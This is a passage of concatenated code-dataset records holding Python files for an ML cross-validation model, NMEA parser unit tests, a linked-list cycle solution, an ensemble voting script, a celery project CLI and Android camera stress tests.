'':\n raise ValueError(f'Not exist group_col_name.')\n folds = GroupKFold(n_splits=fold)\n kfold = folds.split(train, y, groups=train[group_col_name].values)\n elif fold_type == 'kfold':\n folds = KFold(n_splits=fold, shuffle=True, random_state=self.seed) # 1\n kfold = folds.split(train, y)\n elif fold_type == 'self':\n kfold = self_kfold\n\n use_cols = [f for f in train.columns if f not in self.ignore_list]\n self.use_cols = sorted(use_cols) # カラム名をソートし、カラム順による学習への影響をなくす\n\n if key in train.columns:\n train.set_index(key, inplace=True)\n if key in test.columns:\n test.set_index(key, inplace=True)\n\n # if sys.argv[4]=='ods':\n if True:\n self.kfold = zip(*kfold)\n else:\n self.kfold = list(kfold)\n # for n_fold, (trn_idx, val_idx) in enumerate(zip(*kfold)):\n\n result_list = []\n\n for n_fold, (trn_idx, val_idx) in enumerate(self.kfold):\n\n # card_id split\n # if sys.argv[4]=='ods' or sys.argv[5]=='no_out':\n if True:\n x_train, y_train = train.loc[train.index.isin(trn_idx), :][use_cols], y.loc[train.index.isin(trn_idx)].values\n x_val, y_val = train.loc[train.index.isin(val_idx), :][use_cols], y.loc[train.index.isin(val_idx)].values\n else:\n x_train, y_train = train[self.use_cols].iloc[trn_idx, :], y.iloc[trn_idx].values\n x_val, y_val = train[self.use_cols].iloc[val_idx, :], y.iloc[val_idx].values\n print(x_train.shape, x_val.shape, len(val_idx))\n print(y_train.max(), y_train.min())\n\n if n_fold == 0:\n if params['objective']=='lambdarank':\n test_cols = self.use_cols\n test_cols.remove('rank')\n x_test = test[test_cols]\n else:\n x_test = test[self.use_cols]\n\n # GBDTのみ適用するargs\n gbdt_args = {}\n if num_boost_round:\n gbdt_args['num_boost_round'] = num_boost_round\n gbdt_args['early_stopping_rounds'] = early_stopping_rounds\n\n self.estimator = self.train(\n x_train=x_train,\n y_train=y_train,\n x_val=x_val,\n y_val=y_val,\n params=params,\n gbdt_args=gbdt_args\n )\n\n # Tmp Result\n y_pred = self.estimator.predict(x_val)\n best_iter_list.append(self.estimator.best_iteration)\n\n\n if len(self_predict):\n #========================================================================\n # StackしたいOOFの作成\n train_id_list = list(x_train.index)\n self_valid = self_predict[~self_predict[key].isin(train_id_list)]\n y_valid = self_valid[target].values\n x_valid = self_valid[self.use_cols]\n y_pred = self.estimator.predict(x_valid)\n self_valid[f'pred_{n_fold}'] = y_pred\n self_valid = self_valid[[key, f'pred_{n_fold}']].set_index(key)\n del x_valid\n gc.collect()\n #========================================================================\n\n best_iter_list.append(self.estimator.best_iteration)\n\n self.fold_model_list.append(self.estimator)\n\n #========================================================================\n # Scoring\n if scaler:\n y_val = scaler.inverse_transform(y_val.reshape(-1, 1)).ravel()\n y_pred = scaler.inverse_transform(y_pred.reshape(-1, 1)).ravel()\n sc_score = self.sc_metrics(y_val, y_pred)\n else:\n sc_score = self.sc_metrics(y_valid, y_pred)\n #========================================================================\n\n list_score.append(sc_score)\n if self.viz_detail:\n self.logger.info(f'Fold No: {n_fold} | {self.metric}: {sc_score}')\n\n ' OOF for Stackng '\n if len(val_stack):\n val_stack = val_stack.join(self_valid.copy())\n else:\n base_train = self_predict[[key, target]]\n val_stack = base_train.set_index(key).join(self_valid.copy())\n\n print(f\"Train Valid Stack: {val_stack.shape}\")\n\n\n else:\n x_val['prediction'] = y_pred\n x_val[target] = y_val\n result_list.append(x_val.reset_index()[[key, 'prediction', target]])\n\n self.fold_pred_list.append(y_pred)\n self.fold_val_list.append(y_val)\n self.fold_model_list.append(self.estimator)\n\n if scaler:\n y_val = scaler.inverse_transform(y_val.reshape(-1, 1)).ravel()\n y_pred = scaler.inverse_transform(y_pred.reshape(-1, 1)).ravel()\n sc_score = self.sc_metrics(y_val, y_pred)\n else:\n sc_score = self.sc_metrics(y_val, y_pred)\n\n list_score.append(sc_score)\n if self.viz_detail:\n self.logger.info(f'Fold No: {n_fold} | {self.metric}: {sc_score}')\n\n test_pred = self.estimator.predict(x_test)\n\n if scaler:\n test_pred = scaler.inverse_transform(test_pred.reshape(-1, 1)).ravel()\n\n # 対数化を解除\n # if self.objective.count('reg'):\n # test_pred = np.expm1(test_pred)\n # test_pred += y_min + 5\n\n if len(self.prediction) == 0:\n self.prediction = test_pred\n else:\n self.prediction += test_pred\n\n ' Feature Importance '\n feim_name = f'{n_fold}_importance'\n feim = self.df_feature_importance(feim_name=feim_name)\n\n if len(self.cv_feim) == 0:\n self.cv_feim = feim.copy()\n else:\n self.cv_feim = self.cv_feim.merge(feim, on='feature', how='inner')\n\n #========================================================================\n # CV SCORE & F1SCORE\n #========================================================================\n self.val_score_list = list_score\n self.cv_score = np.mean(list_score)\n self.iter_avg = np.mean(best_iter_list)\n if len(self_predict):\n pred_cols = [col for col in val_stack.columns if col.count('pred_')]\n val_stack['prediction'] = val_stack[pred_cols].mean(axis=1)\n\n if params['objective']=='binary':\n val_stack = pd.concat(result_list, axis=0)\n y_train = val_stack[target].values\n y_allval = val_stack['prediction'].values\n self.train_stack = val_stack\n self.sc_confusion_matrix(y_train, y_allval)\n\n\n self.logger.info(f'''\n#========================================================================\n# Train End.''')\n [self.logger.info(f'''\n# Validation No: {i} | {self.metric}: {score}''') for i, score in enumerate(list_score)]\n self.logger.info(f'''\n# Params : {params}\n# CV score : {self.cv_score}\n#======================================================================== ''')\n\n if self.objective=='binary':\n self.logger.info(f'''\n# Accuracy : {self.accuracy} {self.true}/{len(test)}\n# F1 score : {self.f1}\n# TP:{self.cmx[0]} FP:{self.cmx[2]}\n# FN:{self.cmx[1]} TN:{self.cmx[3]}\n#======================================================================== ''')\n\n ' fold数で平均をとる '\n self.prediction = self.prediction / fold\n\n\n ' OOF for Stackng '\n if oof_flg:\n pred_stack = test.reset_index()[[key, target]]\n pred_stack['prediction'] = self.prediction\n result_list.append(pred_stack)\n\n if len(self_predict):\n val_stack.reset_index(inplace=True)\n result_list.append(val_stack[pred_stack.columns])\n result_stack = pd.concat(result_list, axis=0, ignore_index=True)\n result_stack = df_base_id.merge(result_stack, how='inner', on=key)\n self.logger.info(\n f'result_stack shape: {result_stack.shape} | cnt_id: {len(result_stack[key].drop_duplicates())}')\n else:\n result_stack = []\n\n importance = []\n for fold_no in range(fold):\n if len(importance) == 0:\n importance = self.cv_feim[f'{fold_no}_importance'].values.copy()\n else:\n importance += self.cv_feim[f'{fold_no}_importance'].values\n\n self.cv_feim['avg_importance'] = importance / fold\n self.cv_feim.sort_values(by=f'avg_importance',\n ascending=False, inplace=True)\n self.cv_feim['rank'] = np.arange(len(self.cv_feim))+1\n\n self.result_stack = result_stack\n\n return self\n","sub_path":"model/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":25615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"371371715","text":"'''\r\nHelper, property, static and magic method tests for pynmeagps\r\n\r\nCreated on 3 Oct 2020\r\n\r\n*** NB: must be saved in UTF-8 format ***\r\n\r\n:author: semuadmin\r\n'''\r\n\r\nimport unittest\r\nimport datetime\r\nfrom pynmeagps import NMEAReader, NMEAMessage, NMEAMessageError, NMEATypeError # pylint: disable=unused-import\r\nimport pynmeagps.nmeahelpers as nmh\r\n\r\n\r\nclass StaticTest(unittest.TestCase):\r\n\r\n def setUp(self):\r\n self.maxDiff = None\r\n self.messageCRAP = '$GNRMC,,%$£'\r\n self.messageBLANK = '$GNRMC,,A,,N,,W,0.046,,,,,A,V*0F'\r\n self.messageGLL = '$GNGLL,5327.04319,S,00214.41396,E,223232.00,A,A*68\\r\\n'\r\n self.messagePUBX = '$PUBX,00,103607.00,5327.03942,N,00214.42462,W,104.461,G3,29,31,0.085,39.63,-0.007,,5.88,7.62,8.09,6,0,0*69\\r\\n'\r\n self.messageBADCK = '$GNGLL,5327.04319,S,00214.41396,E,223232.00,A,A*22\\r\\n'\r\n self.msgGLL = NMEAReader.parse(self.messageGLL)\r\n self.msgPUBX00 = NMEAReader.parse(self.messagePUBX)\r\n\r\n def tearDown(self):\r\n pass\r\n\r\n#*******************************************\r\n# Helper methods\r\n#*******************************************\r\n\r\n def testInt2Hex(self):\r\n res = nmh.int2hexstr(15)\r\n self.assertEqual(res, '0F')\r\n res = nmh.int2hexstr(104)\r\n self.assertEqual(res, '68')\r\n\r\n def testGetParts(self):\r\n res = nmh.get_parts(self.messageGLL)\r\n self.assertEqual(res, ('GN', 'GLL', ['5327.04319', 'S', '00214.41396', 'E', '223232.00', 'A', 'A'], '68'))\r\n\r\n def testGetPartsCRAP(self): # test badly formed NMEA message\r\n EXPECTED_ERROR = \"Badly formed message $GNRMC,,%$£\"\r\n with self.assertRaises(NMEAMessageError) as context:\r\n nmh.get_parts(self.messageCRAP)\r\n self.assertTrue(EXPECTED_ERROR in str(context.exception))\r\n\r\n def testGetContent(self):\r\n res = nmh.get_content(self.messageGLL)\r\n self.assertEqual(res, 'GNGLL,5327.04319,S,00214.41396,E,223232.00,A,A')\r\n\r\n def testCalcChecksum(self):\r\n res = nmh.calc_checksum(self.messageGLL)\r\n self.assertEqual(res, '68')\r\n res = nmh.calc_checksum(self.messagePUBX)\r\n self.assertEqual(res, '69')\r\n\r\n def testGoodChecksum(self):\r\n res = nmh.isvalid_cksum(self.messageGLL)\r\n self.assertEqual(res, True)\r\n\r\n def testBadChecksum(self):\r\n res = nmh.isvalid_cksum(self.messageBADCK)\r\n self.assertEqual(res, False)\r\n\r\n def testDMM2DDD(self):\r\n res = nmh.dmm2ddd('5314.12345', 'LA')\r\n self.assertEqual(res, 53.235391)\r\n res = nmh.dmm2ddd('00214.12345', 'LN')\r\n self.assertEqual(res, 2.235391)\r\n res = nmh.dmm2ddd('12825.12344', 'LN')\r\n self.assertEqual(res, 128.418724)\r\n\r\n def testDDD2DMM(self):\r\n res = nmh.ddd2dmm(53.75000, 'LA')\r\n self.assertEqual(res, '5345.00000')\r\n res = nmh.ddd2dmm(-2.75000, 'LN')\r\n self.assertEqual(res, '00245.00000')\r\n res = nmh.ddd2dmm(128.418724, 'LN')\r\n self.assertEqual(res, '12825.12344')\r\n res = nmh.ddd2dmm(\"\", 'LN')\r\n self.assertEqual(res, \"\")\r\n\r\n def testDate2UTC(self):\r\n res = nmh.date2utc('')\r\n self.assertEqual(res, \"\")\r\n res = nmh.date2utc('120320')\r\n self.assertEqual(res, datetime.date(2020, 3, 12))\r\n\r\n def testTime2UTC(self):\r\n res = nmh.time2utc('')\r\n self.assertEqual(res, \"\")\r\n res = nmh.time2utc('081123.000')\r\n self.assertEqual(res, datetime.time(8, 11, 23))\r\n\r\n def testTime2str(self):\r\n res = nmh.time2str(datetime.time(8, 11, 23))\r\n self.assertEqual(res, '081123.00')\r\n\r\n def testDate2str(self):\r\n res = nmh.date2str(datetime.date(2021, 3, 7))\r\n self.assertEqual(res, '070321')\r\n\r\n def testdeg2dms(self):\r\n res = nmh.deg2dms(53.346, 'LA')\r\n self.assertEqual(res, ('53°20′45.6″N'))\r\n res = nmh.deg2dms(-2.5463, 'LN')\r\n self.assertEqual(res, ('2°32′46.68″W'))\r\n res = nmh.deg2dms(\"\", 'LN')\r\n self.assertEqual(res, (\"\"))\r\n\r\n def testdeg2dmm(self):\r\n res = nmh.deg2dmm(-53.346, 'LA')\r\n self.assertEqual(res, ('53°20.76′S'))\r\n res = nmh.deg2dmm(2.5463, 'LN')\r\n self.assertEqual(res, ('2°32.778′E'))\r\n res = nmh.deg2dmm(\"\", 'LN')\r\n self.assertEqual(res, (\"\"))\r\n\r\n def testKnots2spd(self):\r\n res = nmh.knots2spd(1.0, 'MS')\r\n self.assertAlmostEqual (res, 0.5144447324, 5)\r\n res = nmh.knots2spd(1.0, 'FS')\r\n self.assertAlmostEqual (res, 1.68781084, 5)\r\n res = nmh.knots2spd(1.0, 'mph')\r\n self.assertAlmostEqual (res, 1.15078, 5)\r\n res = nmh.knots2spd(1.0, 'kmph')\r\n self.assertAlmostEqual (res, 1.852001, 5)\r\n\r\n def testKnots2spdBAD(self):\r\n EXPECTED_ERROR = \"Invalid conversion unit CRAP - must be in ['MS', 'FS', 'MPH', 'KMPH'].\"\r\n with self.assertRaises(KeyError) as context:\r\n nmh.knots2spd(1.0, 'CRAP')\r\n self.assertTrue(EXPECTED_ERROR in str(context.exception))\r\n EXPECTED_ERROR = \"Invalid knots value CRAP - must be float or integer.\"\r\n with self.assertRaises(TypeError) as context:\r\n nmh.knots2spd('CRAP', 'MS')\r\n self.assertTrue(EXPECTED_ERROR in str(context.exception))\r\n\r\n def testMsgDesc(self):\r\n res = nmh.msgdesc('GGA')\r\n self.assertEqual(res, \"Global positioning system fix data\")\r\n res = nmh.msgdesc('UBX03')\r\n self.assertEqual(res, \"PUBX-SVSTATUS Satellite Status\")\r\n res = nmh.msgdesc('XXX')\r\n self.assertEqual(res, \"Unknown msgID XXX\")\r\n\r\n#*******************************************\r\n# NMEAMessage property methods\r\n#*******************************************\r\n\r\n def testTalkerS(self):\r\n res = self.msgGLL.talker\r\n self.assertEqual(res, 'GN')\r\n\r\n def testTalkerP(self):\r\n res = self.msgPUBX00.talker\r\n self.assertEqual(res, 'P')\r\n\r\n def testMsgIDS(self):\r\n res = self.msgGLL.msgID\r\n self.assertEqual(res, 'GLL')\r\n\r\n def testMsgIDP(self):\r\n res = self.msgPUBX00.msgID\r\n self.assertEqual(res, 'UBX')\r\n\r\n def testPayloadS(self):\r\n res = self.msgGLL.payload\r\n self.assertEqual(res, ['5327.04319', 'S', '00214.41396', 'E', '223232.00', 'A', 'A'])\r\n\r\n def testPayloadP(self):\r\n res = self.msgPUBX00.payload\r\n self.assertEqual(res, ['00', '103607.00', '5327.03942', 'N', '00214.42462', 'W', '104.461', 'G3', '29', '31', '0.085', '39.63', '-0.007', '', '5.88', '7.62', '8.09', '6', '0', '0'])\r\n\r\n def testChecksumS(self):\r\n res = self.msgGLL.checksum\r\n self.assertEqual(res, '68')\r\n\r\n def testChecksumP(self):\r\n res = self.msgPUBX00.checksum\r\n self.assertEqual(res, '69')\r\n\r\n#*******************************************\r\n# NMEAMessage static methods\r\n#*******************************************\r\n\r\n def testSerializeS(self):\r\n res = self.msgGLL.serialize()\r\n self.assertEqual(res, b'$GNGLL,5327.04319,S,00214.41396,E,223232.00,A,A*68\\r\\n')\r\n\r\n def testSerializeP(self):\r\n res = self.msgPUBX00.serialize()\r\n self.assertEqual(res, b'$PUBX,00,103607.00,5327.03942,N,00214.42462,W,104.461,G3,29,31,0.085,39.63,-0.007,,5.88,7.62,8.09,6,0,0*69\\r\\n')\r\n\r\n def testStrS(self): # double check that parsing of serialized message reproduces original message\r\n res1 = self.msgGLL\r\n res2 = NMEAReader.parse(self.msgGLL.serialize())\r\n self.assertEqual(str(res1), str(res2))\r\n\r\n def testStrP(self):\r\n res1 = self.msgPUBX00\r\n res2 = NMEAReader.parse(self.msgPUBX00.serialize())\r\n self.assertEqual(str(res1), str(res2))\r\n\r\n def testNomVal(self):\r\n for att in ('CH', 'ST', 'LA', 'LN'):\r\n res = NMEAMessage.nomval(att)\r\n self.assertEqual(res, \"\")\r\n res = NMEAMessage.nomval('HX')\r\n self.assertEqual(res, 0)\r\n res = NMEAMessage.nomval('IN')\r\n self.assertEqual(res, 0)\r\n res = NMEAMessage.nomval('DE')\r\n self.assertEqual(res, 0.0)\r\n res = NMEAMessage.nomval('TM')\r\n self.assertIsInstance(res, datetime.time)\r\n res = NMEAMessage.nomval('DT')\r\n self.assertIsInstance(res, datetime.date)\r\n\r\n def testNomValBAD(self):\r\n EXPECTED_ERROR = \"Unknown attribute type XX.\"\r\n with self.assertRaises(NMEATypeError) as context:\r\n NMEAMessage.nomval('XX')\r\n self.assertTrue(EXPECTED_ERROR in str(context.exception))\r\n\r\n def testVal2Str(self):\r\n for att in ('CH', 'ST'):\r\n res = NMEAMessage.val2str(\"AB\", att)\r\n self.assertEqual(res, \"AB\")\r\n res = NMEAMessage.val2str(15, 'HX')\r\n self.assertEqual(res, '0F')\r\n res = NMEAMessage.val2str(23, 'IN')\r\n self.assertEqual(res, '23')\r\n res = NMEAMessage.val2str(15.286, 'DE')\r\n self.assertEqual(res, '15.286')\r\n res = NMEAMessage.val2str(55.5, 'LA')\r\n self.assertEqual(res, \"5530.00000\")\r\n res = NMEAMessage.val2str(2.75, 'LN')\r\n self.assertEqual(res, \"00245.00000\")\r\n res = NMEAMessage.val2str(datetime.datetime(2021, 5, 7, 2, 45, 23), 'TM')\r\n self.assertEqual(res, '024523.00')\r\n res = NMEAMessage.val2str(datetime.datetime(2020, 6, 7, 3, 27, 24), 'DT')\r\n self.assertEqual(res, '070620')\r\n\r\n def testVal2StrBAD(self):\r\n EXPECTED_ERROR = \"Unknown attribute type XX.\"\r\n with self.assertRaises(NMEATypeError) as context:\r\n NMEAMessage.val2str(23.45, 'XX')\r\n self.assertTrue(EXPECTED_ERROR in str(context.exception))\r\n\r\n#*******************************************\r\n# NMEAMessage magic methods\r\n#*******************************************\r\n\r\n def testReprS(self):\r\n res = repr(self.msgGLL)\r\n self.assertEqual(res, \"NMEAMessage('GN','GLL', 0, payload=['5327.04319', 'S', '00214.41396', 'E', '223232.00', 'A', 'A'])\")\r\n\r\n def testReprP(self):\r\n res = repr(self.msgPUBX00)\r\n self.assertEqual(res, \"NMEAMessage('P','UBX', 0, payload=['00', '103607.00', '5327.03942', 'N', '00214.42462', 'W', '104.461', 'G3', '29', '31', '0.085', '39.63', '-0.007', '', '5.88', '7.62', '8.09', '6', '0', '0'])\")\r\n\r\n def testEvalReprS(self): # double check that evaluation of repr(message) reproduces original message\r\n res1 = self.msgGLL\r\n res2 = eval(repr(self.msgGLL))\r\n self.assertEqual(str(res1), str(res2))\r\n\r\n def testEvalReprP(self):\r\n res1 = self.msgPUBX00\r\n res2 = eval(repr(self.msgPUBX00))\r\n self.assertEqual(str(res1), str(res2))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # import sys;sys.argv = ['', 'Test.testName']\r\n unittest.main()\r\n","sub_path":"tests/test_static.py","file_name":"test_static.py","file_ext":"py","file_size_in_byte":10678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"365483468","text":"# -*- encoding: utf-8 -*-\n\n\n\"\"\"\n@File : letcode_142_环形链表 II.py\n@Time : 2020/10/10 上午9:17\n@Author : dididididi\n@Email : \n@Software: PyCharm\n\"\"\"\n\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solutions(object):\n \"\"\"\n 双指针解决,这儿有个数学算法很有意思\n a + (n + 1)b + nc = 2(a + b)\n => a = c + (n - 1)(b + c)\n \"\"\"\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n p1 = p2 = head\n while p2 and p2.next:\n p1 = p1.next\n p2 = p2.next.next\n if p1 == p2:\n p = head\n while p1 != p:\n p = p.next\n p1 = p1.next\n return p\n return None\n\n\nclass Solution(object):\n \"\"\"\n hash表解决,感觉这道题用hash表好贱\n 有环就肯定会循环,无环肯定走到None\n \"\"\"\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n visited = set()\n while head:\n if head in visited:\n return head\n visited.add(head)\n head = head.next\n return None\n\n\n\nif __name__ == '__main__':\n head = ListNode(3)\n head.next = ListNode(2)\n head.next.next = ListNode(0)\n head.next.next.next = ListNode(-4)\n # head.next.next.next.next = head.next.next\n sol = Solution()\n print(sol.detectCycle(head))","sub_path":"letcode_142_环形链表 II.py","file_name":"letcode_142_环形链表 II.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"427325676","text":"##########hard vote to result 1-4\n\nimport pandas as pd\nimport numpy as np\nimport os\nfrom pprint import pprint\nDATA_DIR = '../data/'\nfiles = os.listdir(DATA_DIR)\nfiles = [i for i in files if i[0]!='.']\nprint(len(files))\npprint(files)\n\nsub_exp_df = pd.read_csv('../submit_example.csv')\ndf_merged = sub_exp_df.drop(['label'], axis=1)\n# df_merged = pd.read_csv(DATA_DIR + files[0])\nfor file in files:\n tmp_df = pd.read_csv(DATA_DIR + file)\n df_merged = df_merged.merge(tmp_df, how='left', on='id')\n print(df_merged.shape)\npprint(df_merged.head(10))\n\ndef work(pres):\n count = [0,0,0]\n for i in pres:\n count[i] += 1\n out = count.index(max(count))\n return out\n\ntmp_arr = np.array(df_merged.iloc[:,1:])\nlabel_voted = [work(line) for line in tmp_arr]\n\ndf_summit = df_merged[['id']]\n\ndf_summit['label'] = label_voted\n\nSUMMIT_DIR = '../submit/'\ndf_summit[['id','label']].to_csv(SUMMIT_DIR + 'result_2.csv',index=False)\nprint(df_summit.shape)\n\n###ceshi\ndef diff_df(fname1, fname2):\n sub_exp_df = pd.read_csv('../submit_example.csv')\n df_3 = sub_exp_df.drop(['label'], axis=1)\n\n df_1 = pd.read_csv(fname1)\n df_2 = pd.read_csv(fname2)\n\n df_3 = df_3.merge(df_1, how='left', on='id')\n df_3 = df_3.merge(df_2, how='left', on='id')\n print(df_3.shape)\n df_diff = df_3[df_3['label_x'] != df_3['label_y']]\n print(df_diff.shape)\n return df_diff\n\n\n","sub_path":"combine/src/vote001.py","file_name":"vote001.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"365623613","text":"import os\nimport sys\n\nimport click\nimport shutil\n\nCURRENT_DIR = os.path.abspath(os.path.dirname(__file__))\nSOURCE_DIR = CURRENT_DIR\nDEPLOY_DIR = os.path.join(CURRENT_DIR, \"deploy\")\nTEMPLATE_DIR = os.path.join(CURRENT_DIR, \"template\")\nTEST_DIR = os.path.join(CURRENT_DIR, \"test\")\nSUB_TESTS_DIRS = [item for item in os.listdir(TEST_DIR)\n if os.path.isdir(os.path.join(TEST_DIR, item))]\n\nPROJECT_DIR = os.path.join(os.getcwd(), \"project\")\nif os.path.exists(PROJECT_DIR):\n APP_DIRS = [item for item in os.listdir(PROJECT_DIR)\n if os.path.isdir(os.path.join(PROJECT_DIR, item))\n and not item.startswith(\"_\")]\n\n\n@click.group()\ndef oshe():\n pass\n\n\n@oshe.command()\ndef init():\n project_dir = os.path.join(os.getcwd(), \"project\")\n if os.path.exists(project_dir):\n click.echo(\"Project is already initialized, exiting...\")\n else:\n click.echo(\"No project folder is found, initializing project template\")\n os.makedirs(project_dir)\n shutil.copy(os.path.join(TEMPLATE_DIR, \"config.py\"), project_dir)\n shutil.copy(os.path.join(TEMPLATE_DIR, \"celery_app.py\"), project_dir)\n\n click.echo(\"creating demo app\")\n app_dir = os.path.join(project_dir, \"demo\")\n shutil.copytree(os.path.join(TEMPLATE_DIR, \"demo\"), app_dir)\n\n\n@oshe.command()\n@click.argument(\"name\")\ndef create(name):\n if os.path.exists(PROJECT_DIR):\n app_dir = os.path.join(PROJECT_DIR, name)\n if not os.path.exists(app_dir):\n click.echo(\"creating app: %s\" % name)\n shutil.copytree(os.path.join(TEMPLATE_DIR, \"demo\"), os.path.join(project_dir, name))\n else:\n click.echo(\"app [%s] already exists, exiting... \" % name)\n else:\n click.echo(\"No project folder is found, you have to initialize project first\")\n\n\n@oshe.command()\n@click.argument(\"environment\", type=click.Choice([\"internal\", \"staging\", \"production\"]))\ndef deploy(environment):\n click.echo(\"deploying to: %s\" % environment)\n\n\n@oshe.command()\n@click.option(\"queue\", \"-Q\", help=\"queue to run\", default=\"all\")\n@click.option(\"loglevel\", \"-L\", help=\"log level to run with\", default=\"info\")\ndef worker(queue, loglevel):\n click.echo(\"starting celery...\")\n python_bin_dir = os.path.dirname(sys.executable)\n celery_path = os.path.join(python_bin_dir, \"celery\")\n if queue != \"all\":\n os.system(\"%s -A project.celery_app:celery_app worker -Q %s -l %s\" % (celery_path, queue, loglevel))\n else:\n os.system(\"%s -A project.celery_app:celery_app worker -l %s\" % (celery_path, loglevel))\n\n\n@oshe.command()\ndef beat():\n python_bin_dir = os.path.dirname(sys.executable)\n celery_path = os.path.join(python_bin_dir, \"celery\")\n os.system(\"%s -A project.celery_app:celery_app beat\" % celery_path)\n\n\n@oshe.command()\n@click.argument(\"type\", type=click.Choice(SUB_TESTS_DIRS))\n@click.option(\"suit\", \"--suit\", default=\"all\")\ndef test(type, suit):\n click.echo(\"testing %s.%s\" % (type, suit))\n\n\nif __name__ == \"__main__\":\n oshe()\n","sub_path":"oshe/oshe.py","file_name":"oshe.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"112616821","text":"#!/usr/bin/python\n# coding:utf-8\n\nfrom devicewrapper.android import device as d\nimport unittest\nimport string\nimport time\nimport util\nimport random\n\na = util.Adb()\nsm = util.SetCaptureMode()\ntb = util.TouchButton()\nso = util.SetOption()\n\n#Written by XuGuanjun\n\nPACKAGE_NAME = 'com.intel.camera22'\nACTIVITY_NAME = PACKAGE_NAME + '/.Camera'\n\n\nSD =['4','false']\nHD =['5','false']\nHSD =['5','true']\nHFD =['6','false']\nHSFD =['6','true']\nCAMERAMODE_LIST = ['Depth Snapshot','Single','Video','Panorama','Burst','Perfect Shot']\nFLASH_MODE =['on','off','auto']\nSCENE_MODE =['auto','landscape','portrait','night','sports'] #'night-portrait'\nEXPOSURE_MODE = ['-6','-3','0','3','6']\nPICTURESIZE_MODE =['WideScreen','StandardScreen']\nVIDEOSIZE_MODE = [['false','4'],['false','5'],['true','5'],['false','6'],['true','6']]\n\n# PATH\nPATH ='/data/data/com.intel.camera22/shared_prefs/com.intel.camera22_preferences_0_0.xml '\n# key\nPICTURE_SIZE_KEY ='| grep pref_camera_picture_size_key'\n\nclass CameraTest(unittest.TestCase):\n def setUp(self):\n super(CameraTest,self).setUp()\n #Delete all image/video files captured before\n a.cmd('rm','/sdcard/DCIM/*')\n #Refresh media after delete files\n a.cmd('refresh','/sdcard/DCIM/*')\n #Launch social camera\n self._launchCamera()\n\n def tearDown(self):\n #ad.cmd('pm','com.intel.camera22') #Force reset the camera settings to default\n self._pressBack(4)\n super(CameraTest,self).tearDown()\n a.cmd('pm','com.intel.camera22')\n \n # Test case 1\n def testSwitchMode50Times(self):\n \"\"\"\n Summary:testswitchmode50times: test switch mode 50 times\n Steps: \n 1.Launch single capture activity\n 2.Switch camera mode 50 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(50):\n mode = random.choice(CAMERAMODE_LIST)\n sm.switchCaptureMode(mode)\n\n # Test case 2\n def testLaunchCamera50Times(self):\n \"\"\"\n Summary:testlaunchcamera50times: Launch camera 50 times\n Steps: \n 1.Launch single capture activity\n 2.Repeat 50 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(50):\n self._pressBack(4)\n a.cmd('launch','com.intel.camera22/.Camera')\n assert d(resourceId = 'com.intel.camera22:id/shutter_button').wait.exists(timeout=1000),'Launch camera failed!!'\n\n # Test case 3\n def testSwitchBackFrontCameraInSingleMode30Times(self):\n \"\"\"\n Summary:SwitchBack/Frontcamerainsinglemode30times: Switch Back/Front camera in each mode 30 times\n Steps: \n 1.Launch single capture activity\n 2.Switch Back/Front camera in single mode 30 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(30):\n tb.switchBackOrFrontCamera('front')\n tb.switchBackOrFrontCamera('back')\n time.sleep(1)\n\n # Test case 4\n def testChangeFlashMode100Times(self):\n \"\"\"\n Summary:testChangeflashmode100times: Change flash mode 100 times\n Steps: \n 1.Launch single capture activity\n 2.Change flash mode 100 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(100):\n flash_mode = random.choice(FLASH_MODE)\n so.setCameraOption('Flash',flash_mode)\n\n # Test case 5\n def testChangeSceneMode100Times(self):\n \"\"\"\n Summary:testChangescenemode100times: Change scene mode 100 times\n Steps: \n 1.Launch single capture activity\n 2.Change scene mode 100 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(100):\n scene_mode = random.choice(SCENE_MODE)\n so.setCameraOption('Scenes',scene_mode)\n\n # Test case 6\n def testChangeExposureMode100Times(self):\n \"\"\"\n Summary:testChangeexposuremode100times: Change exposure mode 100 times\n Steps: \n 1.Launch single capture activity\n 2.Change exposure mode 100 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(100):\n exposure_mode = random.choice(EXPOSURE_MODE)\n so.setCameraOption('Exposure',exposure_mode)\n\n\n\n # Test case 7\n def testChangePictureSizeMode100Times(self):\n \"\"\"\n Summary:testChangepicturesizemode100times: Change picture size mode 100 times\n Steps: \n 1.Launch single capture activity\n 2.Change picture size 100 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(100):\n size_mode = random.choice(PICTURESIZE_MODE)\n so.setCameraOption('Picture Size',size_mode)\n\n #Test case 8\n def testChangeVideoSizeMode100Times(self):\n \"\"\"\n Summary:testChangevideosizemode100times: Change video size mode 100 times\n Steps: \n 1.Launch single capture activity\n 2.Change video size 100 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Video')\n for i in range(100):\n size_mode = random.choice(VIDEOSIZE_MODE)\n so.setCameraOption('Video Size',size_mode)\n\n\n #case 9\n def testEnterGalleryFromGalleryPreviewThumbnail100times(self):\n '''\n Summary: enter gallery from gallery preview thumbnail 100times\n Steps : 1.Launch single capture activity\n 2.enter gallery from gallery preview thumbnail 100times\n 3.Exit activity\n '''\n for i in range(100):\n time.sleep(3)\n tb.captureAndCheckPicCount('single',2) # capture picture\n time.sleep(1) \n d(resourceId = 'com.intel.camera22:id/thumbnail').click.wait() # enter 